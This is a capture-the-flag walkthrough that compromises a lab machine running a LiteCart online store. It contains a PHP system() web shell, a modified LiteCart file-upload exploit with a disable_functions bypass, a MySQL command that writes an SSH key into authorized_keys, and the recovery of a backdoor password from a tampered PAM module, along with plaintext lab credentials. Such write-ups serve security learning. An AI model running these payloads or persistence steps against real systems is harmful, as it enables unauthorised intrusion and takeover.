image-20200917153421555

Author: Ikonw

Nmap Scan:

# Nmap 7.80 scan initiated Thu Sep 17 12:32:35 2020 as: nmap -Pn -sCV -p22,80 -oN nmap/Full_10.10.10.207.nmap 10.10.10.207
Nmap scan report for 10.10.10.207
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://10.10.10.207/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 17 12:32:47 2020 -- 1 IP address (1 host up) scanned in 12.01 seconds

Port 80 webserver was a online store

As usual, launch gobuster enumerate potential directories

image-20200917153449369

Found a backup directory, I believe it’s the source code for the web

image-20200917153509156

search for the keyword username to look for potential plaintext username or hard coded password 

grep -R 'username|password' |grep -v 'jquery'

and we found login.php have suspicious file_put_contents

if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

if (isset($_POST['login'])) {
  //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
  user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}

Navigate to the location and we got the user and passwd

admin:theNextGenSt0r3!~

image-20200917153549898

Login to the authentication portal, we got the LiteCart version number

image-20200917153639177

And yeah, we got the poc 

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LiteCart 2.1.2 - Arbitrary File Upload                                                                                                                                                                   | php/webapps/45267.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

The initial exploit was not able to work, it was able to create a php file, but system seems disable. Tried different shell execution function like shell_exec didnt work either. 

<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>

Instead of continuing try for luck, phpinfo() will give us what function is disabled. And we got tons of function being disabled

image-20200918141630991

After research, found a php script able to bypass the restriction

PHP 7.0-7.3 disable_functions bypass

Modified the script for the pwn function

pwn($_REQUEST['c']);

Next modify the litecart poc

f = open('exploit.php','r')
data = f.read()
files = {
        'vqmod': (rand + ".php",data, "application/xml"),
        'token':one,
        'upload':(None,"Upload")
    }

and we manage to gain rce

image-20200918142412690

After trying hard to I found it seems www-data is very restricted, only very few command able to execute. I didnt manage to get a proper reverse shell.

After long enumeration

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
sysadmin:x:1000:1000:compromise:/home/sysadmin:/bin/bash
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash
red:x:1001:1001::/home/red:/bin/false

I actually found that, mysql is a user. Went back to the initial foothold, I manage to find the mysql root username and password 

// Database
  define('DB_TYPE', 'mysql');
  define('DB_SERVER', 'localhost');
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'changethis');
  define('DB_DATABASE', 'ecom');
  define('DB_TABLE_PREFIX', 'lc_');
  define('DB_CONNECTION_CHARSET', 'utf8');
  define('DB_PERSISTENT_CONNECTIONS', 'false');

and we got the creds for mysql root:changethis. We can launch mysql client, execute commands to write our ssh public key to authorized_keys

image-20200918144023178

yeah, we manage to get code execution for user mysql

mysql -u root -pchangethis -e "SELECT exec_cmd('echo sshxxxxxxxxxxx' > /var/lib/mysql/.ssh/authorized_keys)"

One thing to note here, you have to encode the + into %2B else it will be shown as a whitespace in authorized_keys file

Last login: Thu Sep  3 11:52:44 2020 from 10.10.14.2
mysql@compromised:~$

and we are in using ssh.

After more enumeration

image-20200918161643308

we found a new password 3*NLJE32I$Fe

it turn up to be sysadmin ‘s password

su and we got the user.txt

Root

We found a suspicious file .pam_unix.so

Use ghidra to reverse it.

in pam_sm_authenticate

we found some backdoor string

image-20200918175358088

convert the unsigned-hex to char sequence

image-20200918175715611

and we got the password zlke~U3Env82m2- with a null behind 

root@compromised:~# whoami && hostname
root
compromised



root